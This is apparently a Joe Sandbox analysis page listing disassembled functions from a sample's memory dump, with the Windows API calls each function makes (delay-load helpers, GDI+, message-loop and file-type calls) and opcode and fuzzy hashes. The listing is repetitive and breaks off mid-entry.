Instruction Fuzzy Hash: 2BF05E31009790FACA2267B48908BCA7B906F5A331F048A49F5F952196C27951A89B33

Function 007C0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 007C0E3D

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 731387cdfcfe651261a8d61ac1038a06c77bfb92054b6cd713a29a12f5426c24
Instruction ID: 008d992e07ba19e8d21889d14ab56fea949f9de9f19aec70e3f4ef0e63235596
Opcode Fuzzy Hash: 731387cdfcfe651261a8d61ac1038a06c77bfb92054b6cd713a29a12f5426c24
Instruction Fuzzy Hash: C5D01211641094D6DA113729686DFFE2B068FD7311F4D007DB2455B283CE5C4C86A6F1

Function 007CA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 007CA62C

Part of subcall function 007CA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 007CA3DA

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: 611556d6a33bddcf97e2729354c655f5c416a49de049a1950cc1fe1426487107
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: 09D0C77121020DB6DF41AF619C16F7E7795EB00345F04812DBC42D5151EAB5DD109556

Function 007CDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,007C1B3E), ref: 007CDD92

Part of subcall function 007CB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007CB579
Part of subcall function 007CB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007CB58A
Part of subcall function 007CB568: IsDialogMessageW.USER32(0001048C,?), ref: 007CB59E
Part of subcall function 007CB568: TranslateMessage.USER32(?), ref: 007CB5AC
Part of subcall function 007CB568: DispatchMessageW.USER32(?), ref: 007CB5B6

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: a780ed3cba6437305e0c791475aa23fe4184d76feba135358d5850ac8b1390dc
Instruction ID: d877a52be48e4e6783c667dc8659df494112b77af9692aa61aa3ce805cf231d7
Opcode Fuzzy Hash: a780ed3cba6437305e0c791475aa23fe4184d76feba135358d5850ac8b1390dc
Instruction Fuzzy Hash: 3DD09E71144300FAD6022B51DD0AF1A7BA6BB88B05F004558B684740B1C6769E31DB16

Function 007CE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 007CE5E3

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: f14405188e439e305824f37d56c5c56d9c59d523f1129fe06a1104519b3a05a8
Instruction ID: 5e867920785a1d8a984b9de5b30ccddfd9080a7b5943188036bcff0781eac7af
Opcode Fuzzy Hash: f14405188e439e305824f37d56c5c56d9c59d523f1129fe06a1104519b3a05a8
Instruction Fuzzy Hash: 2ED0C9B01812809ADA11EBA8AD8EF953BA8BB24B04F90450DF245E6591DA7C44908645

Function 007B98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,007B97BE), ref: 007B98C8

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: e86c9cc9e0e52ffbf4b5c81ecb9dbe2e79c0725178516d1110f1e34a01c967cb
Instruction ID: d40667345694caaad48c398f6c3939caed7b3cfddb4ec6126ef35191cdc9a0eb
Opcode Fuzzy Hash: e86c9cc9e0e52ffbf4b5c81ecb9dbe2e79c0725178516d1110f1e34a01c967cb
Instruction Fuzzy Hash: D4C00234404245968E619B28A9891D97722AE533A67B496A8D3798A0A1C32ACC97EB11

Function 007CE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE3FC

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6d3e22190c8c7e935328b978d6fafc355773ecc7d852bfbd06f0931478f82ce8
Instruction ID: eb5c903665aa968578e1453043d7531bd0578db9861e217b44432be4bcf6899b
Opcode Fuzzy Hash: 6d3e22190c8c7e935328b978d6fafc355773ecc7d852bfbd06f0931478f82ce8
Instruction Fuzzy Hash: 28B012E525A4C0FD360491451C07E37038CC5C8B10330D12EF905C1080D8489C490433

Function 007CE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE3FC

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b9a55fd9779318724d44981fcd2a80f34a7b99b40868dbde3ab33f587173acb4
Instruction ID: 52f5771d82cc4df593d114fcd45e579efec13ed84a1e80d09a2a10da6380b419
Opcode Fuzzy Hash: b9a55fd9779318724d44981fcd2a80f34a7b99b40868dbde3ab33f587173acb4
Instruction Fuzzy Hash: E7B012F525A4C0FC360491451C07E3703CCC4C8F10330902EF804C1080D84C9E450433

Function 007CE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE3FC

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6fb6bfd0c09baf222d40b1898fdc7cdc42de3a7a1e01d4d8f0deb897dc04ce89
Instruction ID: d32dd1115e9ed490db514b3e05fa1f302f791354a013dd46a5a5792ce9d9c822
Opcode Fuzzy Hash: 6fb6bfd0c09baf222d40b1898fdc7cdc42de3a7a1e01d4d8f0deb897dc04ce89
Instruction Fuzzy Hash: 98B012E535A4C0BD320451451D07E77038CC5C8B10330D02EF605D1080D8485C4E0433

Function 007CE5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE580

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bcc117d45ccc05dadff86d718b6f7f75782f6ff760bdd5f36d393711d5a0f221
Instruction ID: f47c1962b764702a099f0af0640ba01c89026984fd629236251fe9667d50d3da
Opcode Fuzzy Hash: bcc117d45ccc05dadff86d718b6f7f75782f6ff760bdd5f36d393711d5a0f221
Instruction Fuzzy Hash: E6B012C626A140FC314451956D07E37135CC4C4B10330523EF804C5080E84C0D950531

Function 007CE5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE580

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 437bce7492e27a9f65bd7f573f83bb828f21e4a9a2f2b2870fe6683f1b596c43
Instruction ID: f9654ceb5daf908f43f305bcec73bfb62de95a3b67cf7ac61106112211806111
Opcode Fuzzy Hash: 437bce7492e27a9f65bd7f573f83bb828f21e4a9a2f2b2870fe6683f1b596c43
Instruction Fuzzy Hash: 05B012C62AA040FC310451956E06E37135CC4C4B10330523EF404C5080EC4C0E560531

Function 007CE593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE580

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 97c1e0b368ad3826dab7a5ae147bf8d0465a6b12b568ff2bdfa1102a742da78d
Instruction ID: 4e0c59c9917e19d14ad06470025fee261c3d758e3e8e950803814cf71f863368
Opcode Fuzzy Hash: 97c1e0b368ad3826dab7a5ae147bf8d0465a6b12b568ff2bdfa1102a742da78d
Instruction Fuzzy Hash: 0FB012C626A140FD310451952D06E37134CD4C4B10330503EF404C5080E84C0D550531

Function 007CE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE3FC

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a788ca6804a94cc57fb8375cdbe53ce5eccb9fdebffcf4ee63197ba4014cdd31
Instruction ID: 21aac2b48b2815219c46ce6b1e231fcaf7882f45ce50004572790c81a4d7f249
Opcode Fuzzy Hash: a788ca6804a94cc57fb8375cdbe53ce5eccb9fdebffcf4ee63197ba4014cdd31
Instruction Fuzzy Hash: 55A022FA2AB0C2BC320822022C0BE3B030CC0C0F28330A02EF820E00C0AC8C2C020833

Function 007CE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE3FC

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3e0f142c5f9e187225bf8524d2a32330f0b4365917f1e894879125b08906e307
Instruction ID: 128bbe89b407b5a1e5afbf8957f2f7f6a3515a33fd91f2496acc0fdcce1c46a7
Opcode Fuzzy Hash: 3e0f142c5f9e187225bf8524d2a32330f0b4365917f1e894879125b08906e307
Instruction Fuzzy Hash: 19A022FA2AF0C2FC320822022C0BE3B030CC0C8F20330A82EF802C00C0AC8C2C020833

Function 007CE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE3FC

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f488536285b678c1abe8fa4ac1364158b8af10d5b7669a340e8a9f9626cc76c9
Instruction ID: 128bbe89b407b5a1e5afbf8957f2f7f6a3515a33fd91f2496acc0fdcce1c46a7
Opcode Fuzzy Hash: f488536285b678c1abe8fa4ac1364158b8af10d5b7669a340e8a9f9626cc76c9
Instruction Fuzzy Hash: 19A022FA2AF0C2FC320822022C0BE3B030CC0C8F20330A82EF802C00C0AC8C2C020833

Function 007CE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE3FC

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4d95b7243a2c15bfb47437ae03eab5fdbbbcf825c6cbc0f37cda98ea8fadd0b6
Instruction ID: 128bbe89b407b5a1e5afbf8957f2f7f6a3515a33fd91f2496acc0fdcce1c46a7
Opcode Fuzzy Hash: 4d95b7243a2c15bfb47437ae03eab5fdbbbcf825c6cbc0f37cda98ea8fadd0b6
Instruction Fuzzy Hash: 19A022FA2AF0C2FC320822022C0BE3B030CC0C8F20330A82EF802C00C0AC8C2C020833

Function 007CE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE3FC

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f1be2c4228e21c7242fc1dfa4506ed0b07e4069f9845ecbc26a47f5b24120e64
Instruction ID: 128bbe89b407b5a1e5afbf8957f2f7f6a3515a33fd91f2496acc0fdcce1c46a7
Opcode Fuzzy Hash: f1be2c4228e21c7242fc1dfa4506ed0b07e4069f9845ecbc26a47f5b24120e64
Instruction Fuzzy Hash: 19A022FA2AF0C2FC320822022C0BE3B030CC0C8F20330A82EF802C00C0AC8C2C020833

Function 007CE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE3FC

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 819094cb7afd74c51ed63a3a0a71a1b0f2efdc613a2e7625257fb1eb362082cb
Instruction ID: 128bbe89b407b5a1e5afbf8957f2f7f6a3515a33fd91f2496acc0fdcce1c46a7
Opcode Fuzzy Hash: 819094cb7afd74c51ed63a3a0a71a1b0f2efdc613a2e7625257fb1eb362082cb
Instruction Fuzzy Hash: 19A022FA2AF0C2FC320822022C0BE3B030CC0C8F20330A82EF802C00C0AC8C2C020833

Function 007CE573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE580

